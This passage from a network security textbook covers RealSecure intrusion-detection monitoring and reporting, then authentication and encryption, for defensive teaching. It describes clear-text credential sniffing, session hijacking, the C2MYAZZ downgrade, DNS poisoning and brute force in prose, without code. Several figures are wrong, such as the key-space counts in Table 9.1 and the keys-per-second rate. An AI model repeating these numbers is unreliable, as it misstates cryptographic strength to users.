\nFigure 8.14: The Lucent Firewall screen of the Global Responses window \nThe option below LMF is OPSEC, which refers to FireWall-1 from Check Point. Options on this tab include \nNotify, which specifies how FireWall-1 should log the recorded event. The Action item specifies how the firewall \nresponds to an event, whether to simply notify, to inhibit the event, or to inhibit and close the connection. The \nFireWall Host specifies which firewall routers are affected—all of them, just the gateway devices, or others as \nspecified by the administrator. The Inhibit Expiration option allows you to specify whether the rule change should \nbe permanent or removed after a specific period of time. And finally, the Initialization Settings and Event Port \noptions specify the IP address and port number of the FireWall-1 Management Server. \nOnce you have finished making configuration changes to the sensor, you should apply your changes to the system \n(if the changes were made to the Global Responses page), or to the sensor from its own Responses window. Click \nOK, and your changes are applied to the system or sensor, and all further traffic inspection is performed using \nthese new policies. \nNote \nIf you have multiple sensors, you should consider using the Global Responses \ninstead of configuring steps for each one. \nMonitoring Events \nYou can now monitor events from the RealSecure console. The Priority windows on the right-hand side of the \nscreen should begin to display selected events once they are detected. You can even try to trigger one of the events \nby launching an attack against one of your protected systems. You do not have to try anything destructive; a \nsimple port scan should suffice to insure that the IDS sensor is doing its job. \nOn the left-hand side of the screen is the RealSecure console is the Activity Tree. This window is shown in Figure \n8.15 with the Events tab selected. The Activity Tree allows you to quickly sort through all recent activity by \nsource IP address, destination IP address, or even specific event. This can be an extremely powerful tool for \ndetermining what traffic is traversing your network. For example, a quick review of Figure 8.15 shows you that \nsomeone from an IP address of 24.6.91.205 has attempted gain access to this NT system (IP address \n24.92.184.100) through a NetBIOS session. \nTip \nYou can access an exploit description of each detected vulnerability by right-clicking it. \n" }, { "page_number": 186, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 186\n \nFigure 8.15: The Events tab of the Activity Tree window \nThe amount of detailed information that you can collect with a good IDS is downright scary. For example, let’s \nsay you want to further investigate the attempt at system access as illustrated in Figure 8.16.You could click the \nSource Tab in order to get a better look at what these users are doing. By expanding the tree you can continue \ndown one of the branches until you can see exactly where each host was going. \n \nFigure 8.16: The Event Inspector window \nBy right-clicking the individual event at the lowest level of detail in the tree, you can choose the Inspect Event \noption. This creates the Event Inspector window, which provides a high level of detail—the source and destination \nIP addresses, the protocols, the source and destination ports, (including the information type and value), along \nwith the actions taken. In fact, you can resolve the IP address of the system that sent the request into a domain \nname (see Figure 8.16). This can be useful; by knowing the domain name you can contact the owner of the domain \nname, and eventually trace the activity to a particular system. \nWhile this does not guarantee you’ll find the hacker, you can at least eliminate one avenue used to attempt system \npenetration. In Figure 8.16, you can see that the source of the connection request to the server comes from a \ncomputer on the home.com domain, (which just happens to be the name reserved for @Home, AT&T’s cable \nmodem ISP. You could now do a WHOIS query to find out the contact information for the owners of the domain \nname, and contact them with the details of the attempted access. @Home keeps track of which users are assigned \nparticular host names, and they have a strict usage policy prohibiting unauthorized probing of systems by their \nclients. \nThe Destination tab yields much of the same detail. The difference is that the tree is sorted by destination IP \naddress or host name. By navigating down the branches, you can see who has accessed each address and what type \nof traffic was generated. \n" }, { "page_number": 187, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 187\nReporting \nAn intrusion detection system would not be complete without the ability to run detailed, summary management \nreports. Before you can run reports from the RealSecure console, you must upload the data stored in each sensor’s \ndatabase. Do this by selecting File ¾ Synchronize All Logs from the RealSecure console menu. \nAfter all the data has been transferred to the console, you can begin to run reports. Select View ¾ Reports from the \nRealSecure console menu. The system includes a dozen canned reports. The Top 20 Events report is shown in \nFigure 8.17. \n \nFigure 8.17: A report on the top 20 events \nThe Top 20 Events report is designed to give you a 20,000-foot view of what has transpired on your network. If \nyou require further detail, you can select one of the events listed in the left-hand column. This will produce an \nadditional text report that identifies every recorded instance of the event. Of course, all reports can be printed if the \nRealSecure console has access to a local or network printer. \nIf none of the reports is to your liking, you can customize new reports to fit your requirements. The console \ndatabase is even ODBC-compliant, so you can read the data file with ODBC-compliant database programs such as \nMicrosoft Access. This provides even more flexibility in analyzing and reporting the information collected by the \nRealSecure system. \nSummary \nIn this chapter you have learned about the basics of intrusion detection systems and how they \ncan aid in securing a network environment. You have seen some of the strengths and \nweaknesses of IDS products in general. We even walked through the installation and \nconfiguration of RealSecure, one of the top-selling IDS products. \nThe next chapter looks at authentication and encryption technology. These have become \nextremely popular subjects as organizations race to provide connectivity over less-than-\nsecure network channels. \n \n \nChapter 9: Authentication and Encryption \nAuthentication and encryption are two intertwined technologies that help to insure that your data remains secure. \nAuthentication is the process of insuring that both ends of the connection are in fact who they say they are. This \napplies not only to the entity trying to access a service (such as an end user) but to the entity providing the service, \nas well (such as a file server or Web site). Encryption helps to insure that the information within a session is not \ncompromised. “Compromising” could include not only reading the information within a data stream, but altering \nit, as well. \nWhile authentication and encryption each has its own responsibilities in securing a communication session, \nmaximum protection can only be achieved when the two are combined. For this reason, many security protocols \ncontain both authentication and encryption specifications. \n" }, { "page_number": 188, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 188\nThe Need for Improved Security \nWhen IP version 4, the version currently in use on the Internet, was created back in the ’70s, network security was \nnot a major concern. While system security was important, little attention was paid to the transport used when \nexchanging information. When IP was first introduced, it contained no inherent security standards. The \nspecifications for IP do not take into account that you may wish to protect the data that IP is transporting. This will \nchange with IP version 6, but it appears that wide acceptance of this new specification is still many years away. \nClear Text Transmissions \nIP currently transmits all data as clear text, which is commonly referred to as transmitting in the clear. This means \nthat the data is not scrambled or rearranged; it is simply transmitted in its raw form. This includes data and \nauthentication information. To see how this appears, let’s start by looking at Figure 9.1. \n \nFigure 9.1: A packet decode of an authentication session initializing \nFigure 9.1 shows a network analyzer’s view of a communication session. We have a user who is in the process of \nretrieving mail with a POP3 mail client. Packets 3–5 are the TCP three-packet handshake used to initialize the \nconnection. Packets 6 and 7 are the POP3 mail server informing the client that it is online and ready. In packet 8, \nwe start finding some very interesting information. If you look towards the bottom of Figure 9.1, you will see the \ndecoded contents of the data field within packet 8. The command USER is used by a POP3 client to pass the logon \nname to a POP3 server. Any text following the USER command is the name of the person who is attempting to \nauthenticate with the system. \nFigure 9.2 shows the POP3 server’s response to this logon name. If you look at the decode for packet 9, you can \nsee that the logon name was accepted. This tells us that the logon name you captured in Figure 9.1 is in fact \nlegitimate. If you can discover this user’s password, you will have enough information to gain access to the \nsystem. \n \nFigure 9.2: The POP3 server accepting the logon name \nIn Figure 9.3, you can see a decode of packet 11. This is the next set of commands sent by the POP3 mail client to \nthe server. The command PASS is used by the client to send the password string. Any text that follows this \ncommand is the password for the user attempting to authenticate with the system. As you can see, the password is \nplainly visible. \n \nFigure 9.3: The POP3 client sending the user’s password \nIn Figure 9.4 we see a decode of packet 12. This is the server’s response to the authentication attempt. Notice that \nthe server has accepted the logon name and password combination. We now know that this was a valid \nauthentication session and that we have a legitimate logon name and password combination in order to gain access \nto the system. In fact, if we decoded further packets, we would be able to view every e-mail message downloaded \nby this user. \n" }, { "page_number": 189, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 189\n \nFigure 9.4: The POP3 server accepting the authentication attempt \nPassively Monitoring Clear Text \nThis POP3 authentication session was captured using a network analyzer. A network analyzer can be either a \ndedicated hardware tool or a software program that runs on an existing system. Network analyzer software can be \npurchased for less than $1,000 for Windows or Mac platforms and is freely available for UNIX. \nNetwork analyzers operate as truly passive devices, meaning that they do not need to transmit any data on to the \nnetwork in order to monitor traffic. While some analyzers do transmit traffic (usually in an effort to locate a \nmanagement station), it is not a requirement. In fact, an analyzer does not even need a valid network address. This \nmeans that a network analyzer can be monitoring your network, and you would have no means of detecting its \npresence without tracing cables and counting hub and switch ports. \nIt is also possible for an attacker to load network analyzer software onto a compromised system. This means that \nan attacker does not need physical access to your facility in order to monitor traffic. She can simply use one of \nyour existing systems to capture the traffic for her. This is why it is so important to perform regular audits on your \nsystems. You clearly do not want a passively monitoring attack to go unnoticed. \nIn order for a network analyzer to capture a communication session, it must be connected somewhere along the \nsession’s path. This could be on the network at some point between the system initializing the session and the \ndestination system. This could also be accomplished by compromising one of the systems at either end of the \nsession. This means that an attacker cannot capture your network traffic over the Internet from a remote location. \nShe must place some form of probe or analyzer within your network. \nNote \nAs you saw in Chapter 4, you can reduce the amount of traffic that an analyzer can \ncapture using bridges, switches, and routers. \nClear Text Protocols \nPOP3 is not the only IP service that communicates via clear text. Nearly every nonproprietary IP service that is not \nspecifically designed to provide authentication and encryption services transmits data as clear text. Here is a \npartial list of clear text services: \nFTP Authentication is clear text. \nTelnet Authentication is clear text. \nSMTP Contents of mail messages are delivered as clear text. \nHTTP Page content and the contents of fields within forms are sent clear text. \nIMAP Authentication is clear text. \nSNMPv1 Authentication is clear text. \nWarning \nThe fact that SNMPv1 uses clear text is particularly nasty. SNMP is used to manage \nand query network devices. This includes switches and routers, as well as servers and \neven firewalls. If the SMTP password is compromised, an attacker can wreak havoc \non your network. SNMPv2 and SNMPv3 include a message algorithm similar to the \none used with Open Shortest Path First (OSPF). This provides a much higher level of \nsecurity and data integrity than the original SNMP specification. Unfortunately, not \nevery networking device supports SNMPv2, let alone SNMPv3. This means that \n" }, { "page_number": 190, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 190\nSNMPv1 is still widely used today. \n \nGood Authentication Required \nThe need for good authentication should by now be obvious. A service that passes logon information as clear text \nis far too easy to monitor. Easily snooped logons can be an even larger problem in environments that do not \nrequire frequent password changes. This gives our attacker plenty of time to launch an attack using the \ncompromised account. Also of concern is that most users try to maintain the same logon name and password for \nall accounts. This means that if I can capture the authentication credentials from an insecure service (such as \nPOP3), I may now have a valid logon name and passwords to other systems on the network, such as NT and \nNetWare servers. \nGood authentication goes beyond validating the source attempting to access a service during initial logon. You \nshould also validate that the source has not been replaced by an attacking host in the course of the communication \nsession. This type of attack is commonly called session hijacking. \nSession Hijacking \nConsider the simple network drawing in Figure 9.5. A client is communicating with a server over an insecure \nnetwork connection. The client has already authenticated with the server and has been granted access. Let’s make \nthis a fun example and assume that the client has administrator-level privileges. Woolly Attacker is sitting on a \nnetwork segment between the client and the server and has been quietly monitoring the session. This has given the \nattacker time to learn what port and sequence numbers are being used to carry on the conversation. \n \nFigure 9.5: An example of a man-in-the-middle attack \nNow let’s assume that Woolly Attacker wishes to hijack the administrator’s session in order to create a new \naccount with administrator-level privileges. The first thing he does is force the client into a state where it can no \nlonger communicate with the server. This can be done by crashing the client by sending it a Ping of death or \nthrough a utility such as WinNuke. This can also be done by launching an attack such as an ICMP flood. No \nmatter what type of attack Woolly launches, his goal is to insure that the client cannot respond to traffic sent by \nthe server. \nNote \nWhen an ICMP flood is launched against a target, the target spends so much time \nprocessing ICMP requests that it does not have enough time to respond to any other \ncommunications. \nNow that the client is out of the way, Woolly Attacker is free to communicate with the server as if he were the \nclient. He can do this by capturing the server’s replies as they head back to the client in order to formulate a proper \nresponse. If Woolly has an intimate knowledge of IP, he may even be able to completely ignore the server’s \nreplies and transmit port and sequence numbers based on what the expected responses from the server will be. In \neither case, Woolly Attacker is now communicating with the server—except that the server thinks it is still \ncommunicating with the original client. \nSo good authentication should also verify that the source remains constant and has not been replaced by another \nsystem. This can be done by having the two systems exchange a secret during the course of the communication \nsession. A secret can be exchanged with each packet transmitted or at random intervals during the course of the \nsession. Obviously, verifying the source of every packet is far more secure than verifying the source at random \nintervals. The communication session would be even more secure if you could vary the secret with each packet \nexchange. This would help to insure that your session would not be vulnerable to session hijacking. \nVerifying the Destination \nThe need to authenticate the source both before and during a communication session is apparent. What may not be \napparent is the need to verify the server. Many people take for granted that they will either connect to the intended \nserver or that they will receive some form of host unreachable message. It may not dawn on them that what they \nassume is the server may actually be an attacker attempting to compromise the network. \n" }, { "page_number": 191, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 191\nC2MYAZZ \nThe C2MYAZZ utility is an excellent example of a server spoofing attack (also known as session hijacking or \nman in the middle). When Windows 95 was originally introduced, it included two methods of authenticating with \na session message block (SMB) system. The default was to authenticate using an encrypted password. This was \nthe preferred method for authenticating with a Windows NT domain. LANMAN authentication was also included, \nhowever, for backwards compatibility with SMB LANMAN server. LANMAN authentication requires that the \nlogon name and password be sent in the clear. \nWhen C2MYAZZ is run, it passively waits for a client to authenticate to the NT server. When a logon is detected, \nC2MYAZZ transmits a single packet back to the client requesting that LANMAN authentication be used instead. \nThe client, trusting that this is the server sending the request, happily obliges and retransmits the credentials in the \nclear. The C2MYAZZ utility would then capture and display the logon name and password combination. \nC2MYAZZ causes no disruption in the client’s session, as the user will still be able to logon and gain system \naccess. \nWhat makes this utility even more frightening is that it can be run from a single bootable floppy disk. An attacker \nonly needs to place this disk into the floppy drive of a system, power the system on, and come back later to collect \nthe captured credentials. \nNote \nMicrosoft did release a patch for this vulnerability, but you need to install it on every \nWindows 95 workstation. Newer versions of Windows don’t suffer from this \nvulnerability. \nDNS Poisoning \nAnother exploit which displays the need for authentication is DNS poisoning. DNS poisoning, also known as \ncache poisoning, is the process of handing out incorrect IP address information for a specific host with the intent \nto divert traffic from its true destination. Eugene Kashpureff proved this was possible in the summer of 1997 when \nhe diverted requests for InterNIC hosts to his alternate domain name registry site called AlterNIC. He diverted \nthese requests by exploiting a known vulnerability in DNS services. \nWhen a name server receives a reply to a DNS query, it does not validate the source of the reply or ignore \ninformation not specifically requested. Kashpureff capitalized on these vulnerabilities by hiding bogus DNS \ninformation inside valid replies. The name server receiving the reply would cache the valid information, as well as \nthe bogus information. The result was that if a user tried to resolve a host within the InterNIC’s domain (for \nexample rs.internic.net which is used for whois queries), she would receive an IP address within AlterNIC’s \ndomain and be diverted to a system on the AlterNIC network. \nWhile Kashpureff’s attack can be considered to be little more than a prank, it does open the door to some far \nnastier possibilities. In an age when online banking is the norm, consider the ramifications if someone diverted \ntraffic from a bank’s Web site. An attacker, using cache poisoning to divert bank traffic to an alternate server, \ncould configure the phony server to appear identical to the bank’s legitimate server. \nWhen a bank client attempts to authenticate to the bank’s Web server in order to manage his bank account, an \nattacker could capture the authentication information and simply present the user with a banner screen stating that \nthe system is currently offline. Unless digital certificates are being used, the client would have no way of knowing \nhe’d been diverted to another site unless he happened to notice the discrepancy in IP addresses. \nNote \nDigital certificates are described in the “Digital Certificate Servers” section later in this \nchapter. \nIt is just as important that you verify the server you are attempting to authenticate with as it is to verify the client’s \ncredentials or the integrity of the session. All three points in the communication process are vulnerable to attack. \nEncryption 101 \nCryptography is a set of techniques used to transform information into an alternate format that can later be \nreversed. This alternate format is referred to as the ciphertext and is typically created using a crypto algorithm and \na crypto key. The crypto algorithm is simply a mathematical formula that is applied to the information you wish to \nencrypt. The crypto key is an additional variable injected into the algorithm to insure that the ciphertext is not \nderived using the same computational operation every time the algorithm processes information. \nLet’s say the number 42 is extremely important to you and you wish to guard this value from peering eyes. You \ncould create the following crypto algorithm in order to encrypt this data: \ndata / crypto key + (2 x crypto key) \nThis process relies on two important pieces: the crypto algorithm itself and the crypto key. Both are used to create \nthe ciphertext, which would be a new numeric value. In order to reverse the ciphertext and produce an answer of \n42, you need to know both the algorithm and the key. There are less secure crypto algorithms known as Caesar \n" }, { "page_number": 192, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 192\nciphers which do not use keys, but these are typically not used because they do not have the additional security of \na crypto key. You only need to know the algorithm for a Caesar cipher in order to decrypt the ciphertext. \nNote \nJulius Caesar is credited as being one of the first people to use encryption. It is believed \nthat he used a simple form of encryption in order to send messages to his troops. \nSince encryption uses mathematical formulas, there is a symbiotic relationship between \nƒ The algorithm \nƒ The key \nƒ The original data \nƒ The ciphertext \nThis means that knowing any three of these pieces will allow you to derive the fourth. The exception is when you \nknow the combination of the original data and the ciphertext. If you have multiple examples of both, you may be \nable to discover the algorithm and the key. \nMethods of Encryption \nThe two methods of producing ciphertext are \nƒ \nThe stream cipher \nƒ \nThe block cipher \nThe two methods are similar except for the amount of data each encrypts on each pass. Most modern encryption \nschemes use some form of a block cipher. \nStream Cipher \nThe stream cipher is one of the simplest methods of encrypting data. When a stream cipher is employed, each bit \nof the data is sequentially encrypted using one bit of the key. A classic example of a stream cipher was the \nVernam cipher used to encrypt teletype traffic. The crypto key for the Vernam cipher was stored on a loop of \npaper. As the teletype message was fed through the machine, one bit of the data would be combined with one bit \nof the key in order to produce the ciphertext. The recipient of the ciphertext would then reverse the process, using \nan identical loop of paper to decode the original message. \nThe Vernam cipher used a fixed-length key, which can actually be pretty easy to deduce if you compare the \nciphertext from multiple messages. In order to make a stream cipher more difficult to crack, you could use a \ncrypto key which varies in length. This would help to mask any discernible patterns in the resulting ciphertext. In \nfact, by randomly changing the crypto key used on each bit of data, you can produce ciphertext that is \nmathematically impossible to crack. This is because using different random keys would not generate any repeating \npatterns that could give a cracker the clues required to break the crypto key. The process of continually varying the \nencryption key is known as a one-time pad. \nBlock Cipher \nUnlike stream ciphers, which encrypt every single bit, block ciphers are designed to encrypt data in chunks of a \nspecific size. A block cipher specification will identify how much data should be encrypted on each pass (called a \nblock) as well as what size key should be applied to each block. For example, the Data Encryption Standard (DES) \nspecifies that DES encrypted data should be processed in 64-bit blocks using a 56-bit key. \nThere are a number of different algorithms that can be used when processing block cipher encryption. The most \nbasic is to simply take the data and break it up into blocks while applying the key to each. While this method is \nefficient, it can produce repetitive ciphertext. If two blocks of data contain exactly the same information, the two \nresulting blocks of ciphertext will be identical, as well. As mentioned earlier, a cracker can use ciphertext that \nrepeats in a nonrandom fashion to break the crypto key. \nA better solution is to use earlier resultants from the algorithm and combine them with later keys. Figure 9.6 \nshows one possible variation. The data you wish to encrypt is broken up into blocks labeled DB1–DB4. An \ninitialization vector (IV) is added to the beginning of the data to insure that all blocks can be properly ciphered. \nThe IV is simply a random character string to insure that two identical messages will not create the same \nciphertext. To create your first block of ciphertext (CT1), you mathematically combine the crypto key, the first \nblock of data (DB1), and the initialization vector (IV). \n" }, { "page_number": 193, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 193\n \nFigure 9.6: Block cipher encryption \nWhen you create the second block of ciphertext (CT2), you mathematically combine the crypto key, the first block \nof ciphertext (CT1), and the second block of data (DB2). Because the variables in your algorithm have changed, \nDB1 and DB2 could be identical, but the resulting ciphertext (CT1 and CT2) will contain different values. This \nhelps to insure that the resulting ciphertext is sufficiently scrambled so that it appears completely random. This \nprocess of using resulting ciphertext in order to encrypt additional blocks of data will continue until all the data \nblocks have been processed. \nThere are a number of different variations on how to mathematically combine the crypto key, the initialization \nvector, and previously created ciphertext. All these methods share the same goal, which is to create a seemingly \nrandom character string of ciphertext. \nPublic/Private Crypto Keys \nSo far, all the encryption techniques we have discussed use secret key algorithms. A secret key algorithm relies on \nthe same key to encrypt and to decrypt the ciphertext. This means that the crypto key must remain secret in order \nto insure the confidentiality of the ciphertext. If an attacker learns your secret key, she would be able to unlock all \nencrypted messages. This creates an interesting Catch-22, because you now need a secure method of exchanging \nthe secret key in order to use the secret key to create a secure method of exchanging information! \nIn 1976, Whitfield Diffie and Martin Hellman introduced the concept of public cipher keys in their paper “New \nDirections in Cryptography.” Not only did this paper revolutionize the cryptography industry; the process of \ngenerating public keys is now known as Diffie-Hellman. \nIn layman’s terms, a public key is a crypto key that has been mathematically derived from a private or secret \ncrypto key. Information encrypted with the public key can only be decrypted with the private key; however, \ninformation encrypted with the private key cannot be decrypted with the public key. In other words, the keys are \nnot symmetrical. They are specifically designed so that the public key is used to encrypt data, while the private \nkey is used to decrypt ciphertext. \nThis eliminates the Catch-22 of the symmetrical secret key, because a secure channel is not required in order to \nexchange key information. Public keys can be exchanged over insecure channels while still maintaining the \nsecrecy of the messages they encrypted. If your friend Fred Tuttle wants to send you a private message, all Fred \nhas to do is encrypt it using your public key. The resulting ciphertext can then only be decrypted using your \nprivate key. \nDiffie-Hellman can even be used to provide authentication. This is performed by signing a message with your \nprivate key before encrypting it with the recipient’s public key. Signing is simply a mathematical algorithm that \nprocesses your private key and the contents of the message. This creates a unique digital signature, which is \nappended to the end of the message. Since the contents of the message are used to create the signature, your digital \nsignature will be different on every message you send. \nFor example, let’s say you want to send Fred a private message. First you create a digital signature using your \nprivate key, then you encrypt the message using Fred’s public key. When Fred receives the message, he first \ndecrypts the ciphertext using his private key and then checks the digital signature using your public key. If the \nsignature matches, Fred knows that the message is authentic and that it has not been altered in transit. If the \nsignature does not match, Fred knows that either the message was not signed by your private key or that the \nciphertext was altered in transit. In either event, the recipient knows that he should be suspicious of the contents of \nthe message. \n" }, { "page_number": 194, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 194\nEncryption Weaknesses \nEncryption weaknesses fall into one of three categories: \nƒ \nMishandling or human error \nƒ \nDeficiencies in the cipher itself \nƒ \nBrute force attacks \nWhen deciding which encryption method best suits your needs, make sure you are aware of the weaknesses of \nyour choice. \nMishandling or Human Error \nWhile the stupid user syndrome may be an odd topic to bring up when discussing encryption methods, it does play \na critical role in insuring that your data remains secure. Some methods of encryption lend themselves better to \npoor key management practices than others. When selecting a method of encryption, make sure you have the \ncorrect infrastructure required to administer the cipher keys in an appropriate manner. \nWhile a one-time pad may be the most secure cipher to use, you must be able to generate enough unique keys to \nkeep up with your data encryption needs. Even if you will use a regular secret key cipher, you must make sure that \nyou have a secure method of exchanging key information between hosts. It does little good to encrypt your data if \nyou are simply going to transmit your secret key over the same insecure channel. \nSimple key management is one of the reasons that public/private cipher keys have become so popular. The ability \nto exchange key information over the same insecure channel that you wish to use for your data has great appeal. \nThis greatly simplifies management: you can keep your private key locked up and secure while transmitting your \npublic key using any method you choose. \nProper Key Management Is Key \nBack in the 1940s, the Soviet Union was using a one-time pad in order to encrypt its most sensitive data. As you \nsaw in the section on stream ciphers, it is mathematically impossible to break encryption using a one-time pad. \nThis, of course, assumes that the user understands the definition of “one-time.” Apparently, the Soviet Union did \nnot. \nSince cipher keys were in short supply, the Soviet Union began reusing some of its existing one-time pad keys by \nrotating them through different field offices. The assumption was that as long as the same office did not use the \nsame key more than once, the resulting ciphertext would be sufficiently secure (how many of you can see your \npointy-haired boss making a similar management decision?). \nApparently, this assumption was off base: the United States was able to identify the duplicate key patterns and \ndecrypt the actual messages within the ciphertext. For more than five years, the United States was able to track \nSoviet spying activity within the United States. This continued until information regarding the cracking activity \nwas relayed to a double agent. \n \nWarning \nYou must make sure that the public keys you use to encrypt data have been received from \nthe legitimate source and not from an attacker who has swapped in a private key of his \nown. The validity of a public key can easily be authenticated through a phone call or some \nother means. \nCipher Deficiencies \nDetermining whether there are any deficiencies in the cipher algorithm of a specific type of encryption is probably \nthe hardest task a non-cryptographer can attempt to perform. There are, however, a few things you can look for to \ninsure that the encryption is secure: \nƒ \nThe mathematical formula that makes up the encryption algorithm should be public \nknowledge. Algorithms that rely on secrecy may very well have flaws that can be extorted \nin order to expedite cracking. \nƒ \nThe encryption algorithm should have undergone open public scrutiny. Anyone should be \nable to evaluate the algorithm and be free to discuss their findings. This means that \n" }, { "page_number": 195, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 195\nanalysis of the algorithm cannot be restricted by confidentiality agreements or contingent \non the cryptographer’s signing a nondisclosure agreement. \nƒ \nThe encryption algorithm should have been publicly available for a reasonable amount of \ntime in order to insure that a proper analysis has been performed. An encryption \nalgorithm with no known flaws that has only been publicly available for a few months has \nnot stood the test of time. One of the reasons that many people trust DES encryption is \nthat it has been around for nearly 15 years. \nƒ \nPublic analysis should have produced no useful weaknesses in the algorithm. This can \nbe a gray area because nearly all encryption algorithms have some form of minor flaw. \nAs a rule of thumb, the flaws found within an algorithm should not dramatically reduce the \namount of time needed to crack a key beyond what could be achieved by trying all \npossible key combinations. \nBy following these simple guidelines, you should be able to make an educated estimation about the relative \nsecurity of an encryption algorithm. \nBrute Force Attacks \nA brute force attack is simply an attempt to try all possible cipher key combinations in order to find the one that \nunlocks the ciphertext. This is why this attack is also known as an exhaustive key search. The cracker makes no \nattempt to actually crack the key, but relies on the ability to try all possible key combinations in a reasonable \namount of time. All encryption algorithms are vulnerable to brute force attacks. \nThere are a couple of key terms in the preceding paragraph. The first is “reasonable.” An attacker must feel that \nlaunching a brute force attack is worth the time. If an exhaustive key search will produce your VISA platinum card \nnumber in a few hours, the attack may be worth the effort. If, however, four weeks of work are required in order to \ndecrypt your father-in-law’s chili recipe, a brute force attack may not be worth the attacker’s effort. \nThe other operative word is “vulnerable.” While all encryption algorithms are susceptible to a brute force attack, \nsome may take so long to try all possible key combinations that the amount of time spent cannot be considered \nreasonable. For example, encryption using a one-time pad can be broken using a brute force attack, but the \nattacker had better plan on having many of his descendants carry on his work long after he is gone. To date, the \nearth has not existed long enough for an attacker to be able to break a proper one-time pad encryption scheme \nusing existing computing power. \nSo the amount of time required to perform a brute force attack is contingent on two factors: how long it takes to \ntry a specific key and how many possible key combinations there are. The amount of time required to try each key \nis dependent on the device providing the processing power. A typical desktop computer is capable of testing \napproximately five keys per second. A device specifically designed to break encryption keys may be able to \nprocess 200 keys or more per second. Of course, greater results can be achieved by combining multiple systems. \nAs for the number of possible key combinations, this is directly proportional to the size of the cipher key. Size \ndoes matter in cryptography: the larger the cipher key the more possible key combinations exist. Table 9.1 shows \nsome common methods of encryption, along with their associated key size. Notice that as the size of the key \nincreases, the number of possible key combinations increases exponentially. \nTable 9.1: Methods of Encryption and Their Associated Keys \nEncryption \nBits \nin \nKey \nNumber \nof \nPossibl\ne Keys \nNetscape \n40 \n1.1x106 \nDES \n56 \n72.1x106 \nTriple DES (2 keys) \n112 \n5.2x1033 \nIDEA \n128 \n3.4x1038 \nRC4 (key bits can vary, commonly uses 128-bit keys) \n128 \n3.4x1038 \nTriple DES (3 keys) \n168 \n3.7x1050 \nBlowfish \nUp \n \n" }, { "page_number": 196, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 196\nTable 9.1: Methods of Encryption and Their Associated Keys \nEncryption \nBits \nin \nKey \nNumber \nof \nPossibl\ne Keys \nto \n448 \nAES \n128, \n192, \n256 \n3.4x1038 \nOf course, all this leads to the question: how long does it take to perform an exhaustive key search on a particular \nencryption algorithm? The answer should scare you. DES encryption (discussed in the DES section of this \nchapter) has become somewhat of an industry standard. Over the past few years, RSA Laboratories has staged a \nDES challenge in order to see how long it would take for a person or persons to crack a string of ciphertext and \ndiscover the message hidden inside. \nIn 1997, the challenge was completed in approximately five months. In January 1998, the challenge was \ncompleted in 39 days. During the final challenge, in January 1999, the Electronic Frontier Foundation (EFF) was \nable to complete the challenge in just under 22 hours. \nThe EFF accomplished this task through a device designed specifically for brute forcing DES encryption. The cost \nof the device was approximately $250,000—well within the price range of organized crime and big business. Just \nafter the challenge, the EFF published a book entitled Cracking DES (O’Reilly and Associates), which completely \ndocuments the design of the device they used. Obviously, this has put a whole new spin on what key lengths are \nconsidered secure. \nGovernment Intervention \nAs you may know, the federal government regulates the export or use of encryption across U.S. borders. These \nregulations originated back in World War II, when the use of encryption was thought to be limited to spies and \nterrorists. These regulations still exist today due in part to the efforts of the National Security Agency (NSA). The \nNSA is responsible for monitoring and decrypting all communication that can be considered of interest to the \nsecurity of the United States government. \nOriginally, the regulations controlled the cipher key size that could be exported or used across U.S. borders. The \nlimitation before the year 2000 was a maximum key size of 40 bits, but there were exceptions to this rule. \nOrganizations that wished to use a larger key size had to apply to the Department of Commerce and obtain a \nlicense to do so under the International Traffic in Arms Regulations (ITAR). In order to obtain a usage license for \nkeys larger than 40 bits, you typically had to be a financial institution or a U.S.-based company with foreign \nsubsidiaries. \nThat all changed in January of 2000, when the U.S. changed its export law to allow any commercial retail \nencryption product to be sold to overseas, provided it was first reviewed by the government. Other countries are \nfollowing in the lead of the U.S.—and this entire trend is considered to be a by-product of the explosive growth of \ne-commerce in the past few years. This decision on the part of the United States points to the threat posed to \nencryption by evermore powerful computer systems—a cycle which sees no end in sight. \n \n \nGood Encryption Required \nIf you are properly verifying your authentication session, why do you even need encryption? \nEncryption serves two purposes: \nƒ \nTo protect the data from snooping \nƒ \nTo protect the data from being altered \nIn the section on clear text transmissions earlier in this chapter, you saw how most IP services \ntransmit all information in the clear. This should be sufficient justification for why you need \nencryption to shield your data from peering eyes. \n" }, { "page_number": 197, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 197\nEncryption can also help to insure that your data is not altered during transmission. This is \ncommonly referred to as a man-in-the-middle attack, because it relies on the attacker’s ability to \ndisrupt the data transfer. Let’s assume you have a Web server configured to accept online catalog \norders. Your customer fills out an online form, which is then saved on the Web server in a plain text \nformat. At regular intervals, these files are transferred to another system via FTP or SMTP. \nIf an attacker can gain access to the Web server’s file system, she would be able to modify these \ntext files prior to processing. A malicious attacker could then change quantities or product numbers \nin order to introduce inaccuracies. The result is a very unhappy client when the wrong order is \nreceived. While this example assumes that the attacker has gained access to a file system, it is \npossible to launch a man-in-the-middle attack while information is in transit on the network, as well. \nSo while your attacker has not stolen anything, she has altered the data—and disrupted your \nbusiness. Had this information been saved using a good encryption algorithm, this attack would \nhave been far more difficult to stage, because the attacker would not know which values within the \nencrypted file to change. Even if she were a good guesser, the algorithm decrypting the cipher \nwould detect the change in data. \n \nSolutions \nThere are a number of solutions available for providing authentication and encryption services. Some are products \nproduced by a specific vendor, while others are open standards. Which option is the right one for you depends on \nyour specific requirements. The options listed below are the most popular for providing authentication, encryption, \nor a combination of the two. Most likely, one of these solutions can fill your needs. \nData Encryption Standard (DES) \nDES is the encryption standard used by the United States government for protecting sensitive, but not classified, \ndata. The American National Standards Institute (ANSI) and the Internet Engineering Task Force (IETF) have also \nincorporated DES into security standards. DES is by far the most popular secret key algorithm in use today. \nThe original standard of DES uses a 40-bit (for export) or 56-bit key for encrypting data. The latest standard, \nreferred to as Triple DES, encrypts the plain text three times using two or three different 56-bit keys. This \nproduces ciphertext that is scrambled to the equivalent of a 112-bit or 168-bit key, while still maintaining \nbackwards-compatibility. \nDES is designed so that even if someone knows some of the plain text data and the corresponding ciphertext, there \nis no way to determine the 